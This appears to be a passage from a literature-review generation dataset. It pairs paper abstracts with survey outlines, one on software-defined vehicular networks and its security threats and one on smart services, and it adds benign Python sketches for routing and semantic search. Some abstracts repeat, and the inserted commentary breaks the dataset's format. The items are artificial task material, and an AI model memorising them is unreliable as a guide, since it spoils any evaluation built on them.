vehicle-to-vehicle or vehicle-to-infrastructure communication, from the source vehicle to the destination vehicle. Simulation results demonstrate that our proposed centralized routing scheme outperforms others in terms of transmission delay, and the transmission performance of our proposed routing scheme is more robust with varying vehicle velocity. 
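To make the prediction-assisted routing idea in the entry above concrete, here is a minimal illustrative sketch, not the cited scheme: node positions are extrapolated with a constant-velocity model, per-link delays are estimated from the predicted distances, and Dijkstra's algorithm selects the minimum-delay path. The delay model, radio range, topology, and prediction horizon are hypothetical, and a learned predictor (as in the cited work) could replace the extrapolation step.

```python
# Illustrative sketch (hypothetical model): controller-side minimum-delay path
# selection over positions predicted with a constant-velocity mobility model.
import heapq
import math

def predict_position(pos, vel, horizon_s):
    """Constant-velocity prediction; a learned predictor could replace this."""
    return (pos[0] + vel[0] * horizon_s, pos[1] + vel[1] * horizon_s)

def link_delay(p1, p2, radio_range_m=300.0, base_delay_ms=2.0):
    """Delay grows with distance; links beyond radio range are unusable."""
    d = math.dist(p1, p2)
    return base_delay_ms * (1 + d / radio_range_m) if d <= radio_range_m else math.inf

def min_delay_path(nodes, src, dst, horizon_s=1.0):
    """nodes: {name: (pos, vel)}; returns (total_delay_ms, path) via Dijkstra."""
    predicted = {n: predict_position(p, v, horizon_s) for n, (p, v) in nodes.items()}
    dist = {n: math.inf for n in nodes}
    prev = {}
    dist[src] = 0.0
    heap = [(0.0, src)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist[u]:
            continue
        if u == dst:
            break
        for v in nodes:
            if v == u:
                continue
            w = link_delay(predicted[u], predicted[v])
            if d + w < dist[v]:
                dist[v] = d + w
                prev[v] = u
                heapq.heappush(heap, (dist[v], v))
    path, n = [], dst
    while n != src:
        path.append(n)
        n = prev[n]          # raises KeyError if dst is unreachable
    path.append(src)
    return dist[dst], list(reversed(path))

if __name__ == "__main__":
    nodes = {"A": ((0, 0), (10, 0)), "B": ((250, 20), (8, 0)),
             "C": ((480, -10), (9, 0)), "D": ((700, 0), (7, 0))}
    print(min_delay_path(nodes, "A", "D"))   # expected path A -> B -> C -> D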
--- paper_title: Security Challenges in Future NDN-Enabled VANETs paper_content: Originally envisioned to tackle the massive content distribution in today's Internet, Information-Centric Networking (ICN) has turned out to be a promising paradigm for different network scenarios, including Vehicular Ad Hoc Networks (VANETs). Data retrieval independent from specific recipients bound to fixed physical locations could be a key enabler for future vehicular networks, fixing old unsolved issues of mobility management in classical IP-based systems. As evidence, several preliminary investigations have been performed on a widely known ICN instance, i.e., the Named-Data Networking (NDN). Nevertheless, the NDN architecture presents a new set of security vulnerabilities. Interest flooding attacks, cache poisoning attacks and privacy violation attacks by means of content names represent concrete NDN threats. While the benefits offered by NDN to vehicular networks have been partially investigated, the impact of major security threats remains unclear. Therefore, this paper opens a more comprehensive discussion of the security risks brought by the application of NDN solutions in VANETs. This is a fundamental first step toward the future design of suitable related countermeasures. --- paper_title: Realization of VANET-Based Cloud Services through Named Data Networking paper_content: Connected car technology (also referred to as VANET) has gradually paved its way to legislation in several countries and soon will be followed by mass-scale deployment. However, the race between the advancements in technologies and utilization of the available resources has left a question mark on the future of pure VANET. Therefore, the research community together with academia and industry have foreseen the evolution of VANET into VANET-based clouds. The data- or content-centric communication paradigm is the point of convergence in these technologies because the content is shared among different nodes in different forms such as infotainment or safety. However, the current IP-based networking is not an ideal choice for content-centric applications because of its larger overhead for establishing, maintaining, and securing the path, addressing complexity, non-scalability for content, routing and mobility management overhead, and so on. Therefore, the limitations and shortcomings of current IP-based networking and the need for efficient content delivery advocate for a paradigm shift. To this end, a new content-centric networking paradigm, namely NDN, has been employed to address the aforementioned issues related to content-centric networking while using IP-based networking. In this article, we foresee the integration of VANET-based clouds with NDN called NDN-VC for reliable, efficient, robust, and safe intelligent transportation systems. We particularly aim at the architecture and concise naming mechanism for NDN-VC. Furthermore, we also outline the unique future challenges faced by the NDN-VC. --- paper_title: Network Slicing to Enable Scalability and Flexibility in 5G Mobile Networks paper_content: We argue for network slicing as an efficient solution that addresses the diverse requirements of 5G mobile networks, thus providing the necessary flexibility and scalability associated with future network implementations. We elaborate on the challenges that emerge when we design 5G networks based on network slicing.
We focus on the architectural aspects associated with the coexistence of dedicated as well as shared slices in the network. In particular, we analyze the realization options of a flexible radio access network with focus on network slicing and their impact on the design of 5G mobile networks. In addition to the technical study, this paper provides an investigation of the revenue potential of network slicing, where the applications that originate from such concept and the profit capabilities from the network operator's perspective are put forward. --- paper_title: Mobile Edge Computing, Fog et al.: A Survey and Analysis of Security Threats and Challenges paper_content: Abstract For various reasons, the cloud computing paradigm is unable to meet certain requirements (e.g. low latency and jitter, context awareness, mobility support) that are crucial for several applications (e.g. vehicular networks, augmented reality). To fulfill these requirements, various paradigms, such as fog computing, mobile edge computing, and mobile cloud computing, have emerged in recent years. While these edge paradigms share several features, most of the existing research is compartmentalized; no synergies have been explored. This is especially true in the field of security, where most analyses focus only on one edge paradigm, while ignoring the others. The main goal of this study is to holistically analyze the security threats, challenges, and mechanisms inherent in all edge paradigms, while highlighting potential synergies and venues of collaboration. In our results, we will show that all edge paradigms should consider the advances in other paradigms. --- paper_title: Network Slicing Based 5G and Future Mobile Networks: Mobility, Resource Management, and Challenges paper_content: 5G networks are expected to be able to satisfy users' different QoS requirements. Network slicing is a promising technology for 5G networks to provide services tailored for users' specific QoS demands. Driven by the increased massive wireless data traffic from different application scenarios, efficient resource allocation schemes should be exploited to improve the flexibility of network resource allocation and capacity of 5G networks based on network slicing. Due to the diversity of 5G application scenarios, new mobility management schemes are greatly needed to guarantee seamless handover in network-slicing-based 5G systems. In this article, we introduce a logical architecture for network-slicing-based 5G systems, and present a scheme for managing mobility between different access networks, as well as a joint power and subchannel allocation scheme in spectrum-sharing two-tier systems based on network slicing, where both the co-tier interference and cross-tier interference are taken into account. Simulation results demonstrate that the proposed resource allocation scheme can flexibly allocate network resources between different slices in 5G systems. Finally, several open issues and challenges in network-slicing-based 5G networks are discussed, including network reconstruction, network slicing management, and cooperation with other 5G technologies. --- paper_title: Infrastructure-Assisted Communication for NDN-VANETs paper_content: Vehicular Ad-Hoc Networks (VANETs) include services such as video streaming for automated safety precautions and autonomous driving. NDN is proposed in VANETs as a solution for the connection breaks, since NDN decouples the content exchange from the location of the host. 
The combination of NDN and VANETs leads to autonomous ad-hoc network architectures that are self-managed. In this paper, we apply the NDN architecture in VANETs, to retrieve information from other vehicles and to save network resources. We present a Vehicle to Infrastructure (V2I) communication architecture for NDN-VANETs, which consists of vehicles and Road Side Units (RSUs). For installed RSUs along the roads we develop two communication techniques: First, in the centralized approach every node that requests content sends its Interests to the nearest RSU. RSUs are responsible for routing the Interests to the content source. In our second approach, a hybrid communication technique uses RSUs as a backup mechanism and forwards packets to them, if a route to the content source is unavailable. We compare our approaches with our previous work iMMM-VNDN, flooding and AODV. Our results show that we outperform previous works in terms of Interest Satisfaction Ratio and the total amount of Delivered Data in the requester node. --- paper_title: A Framework for Experimenting ICN over SDN Solutions using Physical and Virtual Testbeds paper_content: ABSTRACT Information Centric Networking (ICN) is a paradigm in which the network layer provides users with access to content by names, instead of providing communication channels between hosts. The ICN paradigm promises to offer a set of advantages with respect to existing (IP) networks for the support of the large majority of current traffic. In this paper, we consider the deployment of ICN by exploiting the Software Defined Networking (SDN) architecture. SDN is characterized by a logically centralized control plane and a well-defined separation between data and control planes. An SDN-enabled network facilitates the introduction of ICN functionality, without requiring a complex transition strategy and the re-deployment of new ICN capable hardware. More in details, in this paper we provide: i) a solution to support ICN by exploiting SDN, extending a previous work of ours; ii) design and implement an open reference environment to deploy and test the ICN over SDN solutions over local and distributed testbeds; iii) design and implementation of a set of Caching policies that leverage on the ICN over SDN approach; iv) performance evaluation of key aspects of the ICN over SDN architecture and of the designed caching policies. All the source code and the monitoring suite are publicly available. To the best of our knowledge, there are no other similar solutions available in Open Source, nor similar emulation platforms, including also a comprehensive set of monitoring tools. --- paper_title: NFV: Security Threats and Best Practices paper_content: Network function virtualization (NFV) yields numerous benefits, particularly the possibility of a cost-efficient transition of telco hardware functionalities on the software platform to break the vendor lock-in problem. These benefits come at the price of some security flaws. Indeed, with NFV, virtual mobile networks become vulnerable to a number of security threats. These threats can be leveraged using some available mitigation techniques and also through other emerging solutions. This article presents critical security threats that exist in the NFV infrastructure, proposes best security practices to protect against them. ---
Title: A Survey on Software-Defined VANETs: Benefits, Challenges, and Future Directions
Section 1: INTRODUCTION
Description 1: Introduce the development of vehicular ad-hoc networks (VANETs) and their integration with Software Defined Networking (SDN) to address emerging challenges in intelligent transportation systems.
Section 2: BACKGROUND OVERVIEW
Description 2: Provide a brief overview of VANET and SDN technologies, discussing their basic principles, benefits, and challenges.
Section 3: SDN BASED VEHICULAR NETWORKS
Description 3: Present a systematic survey on the state-of-the-art SDN-based VANET (SDVN) architectures, highlighting their design, benefits, and challenges.
Section 3.1: Overview of state-of-the-art SDVN Architectures
Description 3.1: Conduct a comprehensive survey on existing research, describing proposed SDVN architectures and their working methodologies.
Section 3.2: Benefits and Challenges
Description 3.2: Discuss the major benefits and research challenges extracted from the survey of SDVN architectures, focusing on aspects such as resource utilization, network configuration, and security.
Section 4: SDVNS SECURITY ANALYSIS & COUNTERMEASURES
Description 4: Analyze the security threats and vulnerabilities in SDVN architectures and discuss possible countermeasures to mitigate these risks.
Section 4.1: Control Plane Resource Consumption
Description 4.1: Discuss the issue of control plane resource consumption in SDVNs and explore countermeasures to handle excessive requests from the data plane.
Section 4.2: Network Topology Poisoning
Description 4.2: Analyze the implications of network topology poisoning attacks and review existing solutions to prevent such threats.
Section 4.3: Distributed Denial of Service Attacks
Description 4.3: Evaluate the vulnerability of SDVN architectures to DDoS attacks and propose relevant defense mechanisms.
Section 4.4: Rule conflicts violating existing security policies
Description 4.4: Discuss how rule conflicts might arise in SDVN architectures and explore techniques to reconcile these conflicts.
Section 4.5: Privacy
Description 4.5: Highlight privacy concerns related to user information in SDVNs and suggest privacy-preserving mechanisms.
Section 4.6: Forgery
Description 4.6: Describe the threat of message forgery in SDVNs and outline methods to ensure secure information dissemination.
Section 4.7: Tampering
Description 4.7: Address the issue of tampering with in-transit messages and propose approaches for anomaly detection in data packets.
Section 4.8: Jamming
Description 4.8: Discuss how jamming attacks can disrupt SDVN operations and propose strategies to mitigate such attacks.
Section 4.9: Impersonation
Description 4.9: Analyze impersonation attacks in SDVNs and review techniques for detecting and preventing these attacks.
Section 4.10: Application-based attacks
Description 4.10: Inspect attacks on specific vehicular applications like smart grid and platoon management and propose SDVN-based solutions for detection and mitigation.
Section 4.11: Malware Attack Injection
Description 4.11: Review the threat posed by malware injection in SDVNs and suggest frameworks for enhancing the security of vehicular systems.
Section 4.12: Routing based Attacks
Description 4.12: Evaluate routing-based attacks such as sinkhole, sybil, and replay attacks in SDVNs and discuss effective countermeasures.
Section 5: DISCUSSION AND OPEN ISSUES
Description 5: Summarize the findings from the review of SDVN architectures, discuss lessons learned, and outline the future research challenges and directions.
Section 6: CONCLUSIONS
Description 6: Conclude the survey by summarizing the key contributions of the study, highlighting the potential of SDN to support advanced VANET applications, and outlining the future research directions.
Focusing the customer through smart services: a literature review
9
--- paper_title: Enhancing Literature Review Methods - Evaluation of a Literature Search Approach based on Latent Semantic Indexing paper_content: Literature search, as a fundamental and time-consuming step in a literature research process, is part of many established scientific research methods. The facilitated access to scientific resources requires an increasing effort to conduct comprehensive literature reviews. We address the lack of semantic approaches in this context by proposing and evaluating our Tool for Semantic Indexing and Similarity Queries (TSISQ) for the enhancement of established literature review methods. Its applicability is evaluated in different environments and search cases covering realistic applications. Results indicate that TSISQ can increase efficiency by saving valuable time in finding relevant literature in a desired research field, improve the quality of search results, and enhance the comprehensiveness of a review by identifying sources that otherwise would not have been considered. The target audience includes all researchers who need to efficiently gain an overview of a specific research field and refine the theoretical foundations of their research. --- paper_title: Scalable analysis of collective behaviour in smart service systems paper_content: The long term vision of smart service systems in which electronic environments are made sensitive and responsive to the presence of, possibly many, people is gradually taking shape through a number of pilot projects. The purposes of such systems vary from intelligent homes that assist their inhabitants to make their lives more independent and comfortable to much larger environments such as airports in which people are provided with context aware, personalised, adaptive and anticipatory services that are most relevant for them given their location and their current activities. This paper is concerned with the exploration of scalable formal models that can address the collective behaviour of a large number of people moving through a smart environment. --- paper_title: Smart Services Classification Framework paper_content: The main goal of the study is development of the classification framework of smart service attributes as a first step in developing methodology of smart services implementation for Enterprise Information Portal (EIP) maintenance. First, we analyze available definitions of the "smart services" concept and concepts related to it: smart services are based on the idea of co-creation of value and rely on machine intelligence in connected systems. Second, we describe attributes of EIP services. Finally, we propose a new extended approach of the smart service attributes classification based on the list of characteristics of the EIP services. Our results contribute to the field of smart service research as well as to EIP-related studies both for academics and practitioners, as the proposed classification framework could serve as a basis for creation of smart services typology for the purpose of EIP maintenance. --- paper_title: Analyzing the past to prepare for the future: Writing a literature review paper_content: A review of prior, relevant literature is an essential feature of any academic project. An effective review creates a firm foundation for advancing knowledge. It facilitates theory development, closes areas where a plethora of research exists, and uncovers areas where research is needed.
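The TSISQ entry at the top of this reference block rests on latent semantic indexing. The snippet below sketches the generic LSI retrieval pipeline (TF-IDF weighting, truncated SVD projection, cosine ranking) that such a literature-search tool typically builds on; the toy corpus, query, and component count are invented placeholders, and this is not the TSISQ implementation.

```python
# Generic latent-semantic-indexing search sketch (illustrative only, not TSISQ):
# rank a small corpus of abstracts against a query in a reduced semantic space.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.metrics.pairwise import cosine_similarity

corpus = [  # placeholder abstracts
    "smart services rely on connected objects and machine intelligence",
    "service lifecycle management governs services from design to retirement",
    "vehicular networks use software defined networking for mobility management",
]
query = ["literature on smart service classification"]

vectorizer = TfidfVectorizer(stop_words="english")
tfidf = vectorizer.fit_transform(corpus)

# Project the term-document vectors into a low-dimensional latent semantic space.
svd = TruncatedSVD(n_components=2, random_state=0)
doc_vecs = svd.fit_transform(tfidf)
query_vec = svd.transform(vectorizer.transform(query))

# Rank documents by cosine similarity to the query in the latent space.
scores = cosine_similarity(query_vec, doc_vecs).ravel()
for idx in scores.argsort()[::-1]:
    print(f"{scores[idx]:+.3f}  {corpus[idx]}")
```

Projecting the term-document matrix onto a low-rank latent space is what lets such a search match documents that share meaning with the query even when they share few exact terms.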
--- paper_title: Enhancing Soa With Service Lifecycle Management - Towards A Functional Reference Model paper_content: Service-orientation is a paradigm aiming at decomposing monolithic application systems into services, i.e. functional units that adhere to certain criteria such as standardized interfaces and the ability to be flexibly combined with each other. With the growing importance and diffusion of this paradigm, the management of an increasing number of services along their lifecycle (Service Lifecycle Management - SLM) is becoming a success factor. Although comprehensive IT support is not the only ingredient for successfully managing services, it is a contribution to compensate for the growing complexity. Surprisingly, the topic of software application support in SLM has not yet received systematic coverage in the literature from a functional perspective. Consequently, this paper proposes a functional reference model for SLM and describes the underlying design process. The model supports practitioners in analyzing, designing and implementing software support for SLM. Further it enables to compare and evaluate existing software solutions and as such it supports IT investment decisions. Scientifically the model represents an approach towards designing information systems in the area of SLM. The paper argues that companies should pursue a best-of-breed approach, as there is no single solution available that comprehensively supports the entire lifecycle. Further, the lack of application support of SLM in practice mainly stems from the absence of integrated solutions and missing knowledge on how to evaluate potential applications. --- paper_title: Internet of things: from internet scale sensing to smart services paper_content: The internet of things (IoT) is the latest web evolution that incorporates billions of devices (such as cameras, sensors, RFIDs, smart phones, and wearables), that are owned by different organizations and people who are deploying and using them for their own purposes. Federations of such IoT devices (we refer to as IoT things) can deliver the information needed to solve internet-scale problems that have been too difficult to obtain and harness before. To realize this unprecedented IoT potential, we need to develop IoT solutions for discovering the IoT devices each application needs, collecting and integrating their data, and distilling the high value information each application needs. We also need to provide solutions that permit doing these tasks in real-time, on the move, in the cloud, and securely. In this paper we present an overview of a collection of IoT solutions (which we have developed in partnerships with other prominent IoT innovators and refer to them collectively as IoT platform) for addressing these technical challenges and help springboard IoT to its potential. We also describe a variety of IoT applications that have utilized the proposed IoT platform to provide smart IoT services in the areas of smart farming, smart grids, and smart manufacturing. Finally, we discuss future research and a vision of the next generation IoT infrastructure. --- paper_title: Smart servitization within the context of industrial user–supplier relationships: contingencies according to a machine tool manufacturer paper_content: Advanced manufacturing technologies (AMT) have been hailed as enablers to make industrial products and operations smart. 
The present paper argues that AMT can not only form a lever for developing smart goods and smart production environments, but can likewise form a basis to offer smart services and to propose servitized earning or payment models to industrial users. We do so on the basis of a literature review, followed by a case-based analysis of the AMT and servitization challenges to which a machine tool manufacturer is exposed in its industrial market environment. Consequently, the present study identifies a set of contingencies c.q. catalyzers with regard to seizing AMT for smart servitization practices within industrial business-to-business contexts. These are: the ability to capture relevant data; to exploit such data adequately and convert them into actionable knowledge; and to build trust among users and producers of capital goods in order to come to effective data exchange. We finish by deriving implications for smart servitization in a manufacturing context, and by outlining case-based lessons on how AMT and servitization can further interactive design and manufacturing practices in an industrial producer-user setting. We contend that there may be a gap between the technological and organizational readiness of (many) machine tool companies for smart servitization, on the one hand, and what different publications on AMT and Industry 4.0 are trying to make out. We also find that besides the high-tech and big data components to smart servitization, companies with an ambition in this field should take into account minimum/right information principles, to actually get to deep learning, and to establish a culture of trust with business partners, and inside implicated organizations among departments to create an environment in which smart servitized user-supplier relationships can prosper. --- paper_title: Interactions between Service and Product Lifecycle Management paper_content: Abstract The adoption of advanced manufacturing intelligence technologies requires managing the interaction of information in Product-Service Systems (PSS) by combining Product (PLM) and Service Lifecycle Management (SLM). While up to now no sound methodology exists, there is a strong need to have bi-directional coordination and interaction between PLM and SLM in a systematic way. A further challenge is to close loops, for example feedback from service delivery to the beginning-of-life phase of products. The objective of this paper is therefore to identify the interactions between SLM and PLM in manufacturing firms, based on expert interviews and illustrated in PSS use cases. --- paper_title: High Tech and High Touch: A Framework for Understanding User Attitudes and Behaviors Related to Smart Interactive Services paper_content: Smart interactive services, in contrast with other technology-based services, require significant human-to-human interaction and collaboration in addition to the service provided by the embedded technology itself. The authors’ foundational Delphi study confirms smart interactive services (e.g., remote diagnosis, remote repair of equipment, and telemedicine) are a rapidly growing innovation category across industries. Yet, gaining user acceptance of these types of services presents a significant challenge for managers. To address this challenge, the authors employ a grounded theory approach, drawing on depth interviews, to develop a framework of barriers and facilitators to users’ attitudinal and behavioral responses to smart interactive services. 
The findings reveal a new set of beliefs that are critical in this context. These beliefs are tied to the human element and specifically pertain to beliefs about the “service counterpart (SC),” who is the provider’s employee controlling the technology. Control, t... --- paper_title: SCUOLA project: The “hub of smart services” for cities and communities paper_content: To evolve existing networks present in a city (electric, gas, water, public lighting and transport) may allow a rational use of natural resources (wind and sun), a reduction of consumption (energy efficiency) as well as the evolution of the energy vectors, obtained using ICT (Information and Communications Technology) as enabling technology. The city, seen as a collection of interconnected networks, can make possible the interaction among the different networks, and between citizens and the city, with the aim of making the city more suitable to the needs of the citizens; the citizens are committed in the creation of new sustainable cities through the development of communication technologies. The aim of SCUOLA project is to test an advanced system that can integrate and coordinate the development of smart grids, RES (Renewable Energy Sources), energy efficiency (from the point of view of both heat and electricity) and services to the citizen. --- paper_title: Four strategies for the age of smart services. paper_content: Most industrial manufacturers realize that the real money isn't in products but in services. Companies such as General Electric and IBM have famously made the transition: A large proportion of their revenues and margins come from providing value-added services to customers. But other companies attempting to do the same might miss the boat. It is not enough, the authors say, just to provide services. Businesses must now provide "smart services"--building intelligence (awareness and connectivity) into the products themselves. Citing examples such as Heidelberger Druckmaschinen's Internet-connected printing presses and Eaton Electrical's home-monitoring service, the authors demonstrate how a product that can report its status back to its maker represents an opportunity for the manufacturer to cultivate richer, longer-term relationships with customers. Four business models will emerge in this new, networked world. If you go it alone, it may be as an embedded innovator- that is, your networked product sends back information that can help you optimize service delivery, eliminate waste and inefficiency, and raise service margins. Or, you may pursue a more aggressive solutionist business model- that is, you position your networked product as a "complete solution provider," able to deliver a broader scope of high-value services than those provided by the embedded innovator's product. In the case of a system that aggregates and processes data from multiple products in a building or home, you may be either an aggregator or a synergist, partnering with others to pursue a smart-services opportunity. An aggregator's product is the hub, collecting and processing usage information- and creating a high-value body of data. A synergist's product is the spoke, contributing valuable data or functionality. Woe to the company that takes none of these paths; it'll soon find its former customers locked in--and happily--to other smart service providers. --- paper_title: A software framework for enabling smart services paper_content: ‘Smart’ becomes a buzzword in many sectors of the society. 
Among them, Smart Service is an emerging paradigm for delivering services with ‘smartness’ features. A key ingredient of smart services is various types of contexts including mobile and social contexts. With the advent of sensor technology and availability in mobile devices, contexts become a key source of information from which situations can be inferred. And, situation-specific services have a high potential of being smart services. However, a number of fundamental technical issues remain unresolved, especially in the area of software framework for developing and deploying smart services. In this paper, we present a software framework for context-aware smart life services, Smart Service Framework (SSF). We begin by defining smart services with key characteristics, and define our architectural design of the SSF. We also define a process for provisioning smart services. And, we specify guidelines and algorithms needed for carrying out the four activities in the process. --- paper_title: Ubiquitous Infrastructure and Smart Service on City Gas Environments in Korea paper_content: The information technology paradigm shifts to smart service environment, as ubiquitous technologies are used in the latest industry trend. The major features of ubiquitous smart service are high dynamism and heterogeneity of their environment and the need for context awareness. In order to resolve these features, it is necessary to develop middleware that meet various new requirements. This paper designed middleware on ubiquitous smart service for enhancing the safety and reliability to city gas environment in Korea. The object of this paper will support cornerstone in order to construct the framework of intelligent infrastructure and service for autonomic management. --- paper_title: Scalable analysis of collective behaviour in smart service systems paper_content: The long term vision of smart service systems in which electronic environments are made sensitive and responsive to the presence of, possibly many, people is gradually taking shape through a number of pilot projects. The purposes of such systems vary from intelligent homes that assist their inhabitants to make their lives more independent and comfortable to much larger environments such as airports in which people are provided with context aware, personalised, adaptive and anticipatory services that are most relevant for them given their location and their current activities. This paper is concerned with the exploration of scalable formal models that can address the collective behaviour of a large number of people moving through a smart environment. --- paper_title: Smart Services Classification Framework paper_content: The main goal of the study is development of the classification framework of smart service attributes as a first step in developing methodology of smart services implementation for Enterprise Information Portal (EIP) maintenance. First, we analyze available definitions of the "smart services" concept and concepts related to it: smart services are based on the idea of co-creation of value and rely on machine intelligence in connected systems. Second, we describe attributes of EIP services. Finally, we propose a new extended approach of the smart service attributes classification based on the list of characteristics of the EIP services. 
Our results contribute to the field of smart service research as well as to EIP- related studies both for academics and practitioners, as the proposed classification framework could serve as a basis for creation of smart services typology for the purpose of EIP maintenance. --- paper_title: Enhancing Soa With Service Lifecycle Management - Towards A Functional Reference Model paper_content: Service-orientation is a paradigm aiming at decomposing monolithic application systems into services, i.e. functional units that adhere to certain criteria such as standardized interfaces and the ability to be flexibly combined with each other. With the growing importance and diffusion of this paradigm, the management of an increasing number of services along their lifecycle (Service Lifecycle Management - SLM) is becoming a success factor. Although comprehensive IT support is not the only ingredient for successfully managing services, it is a contribution to compensate for the growing complexity. Surprisingly, the topic of software application support in SLM has not yet received systematic coverage in the literature from a functional perspective. Consequently, this paper proposes a functional reference model for SLM and describes the underlying design process. The model supports practitioners in analyzing, designing and implementing software support for SLM. Further it enables to compare and evaluate existing software solutions and as such it supports IT investment decisions. Scientifically the model represents an approach towards designing information systems in the area of SLM. The paper argues that companies should pursue a best-of-breed approach, as there is no single solution available that comprehensively supports the entire lifecycle. Further, the lack of application support of SLM in practice mainly stems from the absence of integrated solutions and missing knowledge on how to evaluate potential applications. --- paper_title: Fuzzy Consensus Model for Governance in Smart Service Systems paper_content: Abstract Service Systems are means of value-co-creation and are considered “Smart” if they are supported by IT and react to external changes for the satisfaction of the whole. The co-production of value occurs by processes coordinating the participants, which exchange services, and including decision-making activities, such as the choice of a specific Service Provider. Making decisions is a matter of Governance that often conciliate the expectations of everyone. For the selection of Service Providers among a set of suitable ones, it is possible to consider a Fuzzy Consensus Model for a Group Decision Making (GDM) situation within a service scenario. We have a set of Service Providers (possible alternatives), and decision makers, who examine the choices to reach a common decision. The model considers fuzzy preference relations and an advice generation mechanism to support the decision makers. A case study, where heterogeneous experts have to evaluate a research project, is considered. The results indicate that the “most important” expert influence deeply the final decisions. --- paper_title: “Futurizing” smart service: implications for service researchers and managers paper_content: Purpose – The purpose of this paper is to craft a future research agenda to advance smart service research and practice. Smart services are delivered to or via intelligent objects that feature awareness and connectivity. 
For service researchers and managers, one of the most fascinating aspects of smart service provision is that the connected object is able to sense its own condition and its surroundings and thus allows for real-time data collection, continuous communication and interactive feedback. Design/methodology/approach – This article is based on discussions in the workshop on “Fresh perspectives on technology in service” at the International Network of Service Researchers on September 26, 2014 at CTF, Karlstad, Sweden. The paper summarizes the discussion on smart services, adds an extensive literature review, provides examples from business practice and develops a structured approach to new research avenues. Findings – We propose that smart services vary on their individual level of autonomous dec... --- paper_title: Development of a self-adapting intelligent system for building energy saving and context-aware smart services paper_content: Recent advances in ubiquitous technologies facilitate context-aware systems which can offer situation-based services. Wireless sensor networks (WSNs) have become increasingly important in recent years due to their ability to monitor and manage situational information for various intelligent services in ubiquitous environments. However, existing energy management systems are not effectively implemented in home and building environments due to their architectural limitations, such as static system architecture and a finite battery lifetime. Therefore, in this paper, we propose a Self-adapting intelligent system used for providing building control and energy saving services in buildings. Our system consists of a gateway (selfadapting intelligent gateway) and a sensor (self-adapting intelligent sensor). In addition, we also propose an energy-efficiency self-clustering sensor network (ESSN) and a node type indicator based routing (NTIR) protocol that considers the requirements of WSNs, such as network lifetime and system resource management. In order to verify the efficiency of our system, we implemented our system in real test bed and conducted experiments. The results show that autonomous power saving using our system is approximately 16-24% depending on the number of SIS. --- paper_title: IT SERVICE MANAGEMENT IN THE ACADEMIC CURRICULUM: COMPARING AN AUSTRALIAN AND GERMAN EXPERIENCE paper_content: Universities have a responsibility to equip graduates with the knowledge and skills to be productive in their work environment. Recently, the discipline of IT Service Management (ITSM) has become globally recognized as critical to organizations. Academia appears to be lagging industry in providing education in this field. This paper describes the motivation, implementation, outcomes and challenges experienced by two universities, one in Australia and the other in Germany, in designing and offering an ITSM course. Both universities included the curriculum for industry certification for Foundation level examinations and facilitated student access to these examinations. Using a narrative inquiry method, the authors share their experiences and compare these two courses. The feedback from students clearly indicates that the students value the opportunity to achieve industry certification in ITSM. A list of lessons learnt is formulated to assist other universities undertaking similar endeavours. 
The outcomes of the analysis highlight the need for professional development and industry certification of Lecturers, the importance of networking with local industry practitioners, and the importance of maintaining course materials to keep current with frameworks used in the ICT industry. --- paper_title: Checkpoints, hotspots and standalones: placing smart services over time and place paper_content: From the user's point of view Ubicomp and smart environments have been researched especially in the home setting. Nevertheless, papers discussing the relationship of situated interaction and context are few. Effect of context on interaction has been mostly investigated in the mobile setting. To work towards filling this gap, this paper presents a set of interaction profiles for digital services placed in an environment. The main focus of this paper is on deployment of interaction with various smart services in various indoor places. Motivation for this study stems from the need to understand interaction in and with the environment in order to better design smart environments. To this end we analyzed 30 hand-drawn maps of three different indoor spaces with user designed smart service placements and interactions. The results indicate how multi-level, structural, activity and attention data can be combined in interaction profiles. Interaction profiles found in this work are checkpoint, hotspot, standalone, remote and object, which each represent a unique combination of physical structure, service content and preferred interaction method. These profiles and cognitive map data can be used to support smart environment design. --- paper_title: Towards a Consistent Service Lifecycle Model in Service Governance paper_content: Introducing an SOA in a company brings new challenges for the existing management. Small loosely coupled services allow the Enterprise Architecture to flexibly adapt to existing business processes that themselves depend on changing market environments. SOA, however, introduces a new implicit system complexity. Service Governance approaches address this issue by introducing management processes and techniques, and best practices to cope with the new heterogeneity. Service lifecycle management is one aspect. Existing definitions of service lifecycles vary greatly.. In this paper, we compare existing service lifecycle approaches concerning defined phases and process. In particular, we challenge the purpose of the distinctions made between design time, runtime, and change time. Concluding, we propose a consolidated service lifecycle model for usage in Service Governance. --- paper_title: Interactions between Service and Product Lifecycle Management paper_content: Abstract The adoption of advanced manufacturing intelligence technologies requires managing the interaction of information in Product-Service Systems (PSS) by combining Product (PLM) and Service Lifecycle Management (SLM). While up to now no sound methodology exists, there is a strong need to have bi-directional coordination and interaction between PLM and SLM in a systematic way. A further challenge is to close loops, for example feedback from service delivery to the beginning-of-life phase of products. The objective of this paper is therefore to identify the interactions between SLM and PLM in manufacturing firms, based on expert interviews and illustrated in PSS use cases. 
--- paper_title: IMPROVED MODEL TO TEST APPLICATIONS USING SMART SERVICES paper_content: ABSTRACT: Smart applications are getting enormous popularity in the last several years. The research is conducted due to pressing need of rapid testing applications and improves quality models to ensure high quality of Smartphone applications. This work presents a basic approach to improve quality of mobile application by adjusting validation and test concepts for usage in mobile application development. We anticipate that the proposed solution will help the software companies to improve the quality of smartphone applications. Key words: quality assurance, testing mobile application, smart application, cloud computing, smart grid. 1 . INTRODUCTION The enormous progress nowadays for smart applications production and the marvelous acceptance from users for all categories [1] have become an amazing development in our life. Especially in the world of smart phones in general and in smart services specifically, which led to competitions on application development in case of meeting basic needs of users and enabling them to access different services in all spheres of life. This conversion came with the strategic use of the latest information and communication technologies [11,12] achieving user satisfaction by providing flexible and interactive means of communication and intelligent features which work anywhere and anytime across many devices. In the current era, there is an application for everything starting from games, passing through configuration tasks to communications and GPS (Global Positioning System) applications. As a result, it becomes incumbent on anyone who tries to establish business and services in the area of internet to put smart phone applications as the priority. Moreover, when developers devise an application, there are a number of important aspects that they take into account, for instance: the idea, design and promotion besides taking into consideration the difference between smart applications and software for traditional computers. After this development and progress it has become an important issue to support smart devices by several kind of applications with high efficiency. This corresponds to the important role of this area of how we test these applications to represent an intelligent application in smart services [6,8]. We present an advanced model to test the range of efficiency and quality assurance of applications in the framework of smart services. Further paper is organized as follows. Section II covers the related work and defines the problem to be addressed. Section III illustrates the proposed solution. --- paper_title: Smart services for home automation. managing concurrency and failures: New wine in old bottles ? paper_content: Home automation represents a growing market in the industrialized world. Today's systems are mainly based on ad hoc and proprietary solution, with little to no interoperability and smart integration. However, in a not so distant future, devices installed in our home will be able to smartly interact and integrate in order to offer complex services with rich functionalities. Realizing this kind of integration push developers to increase 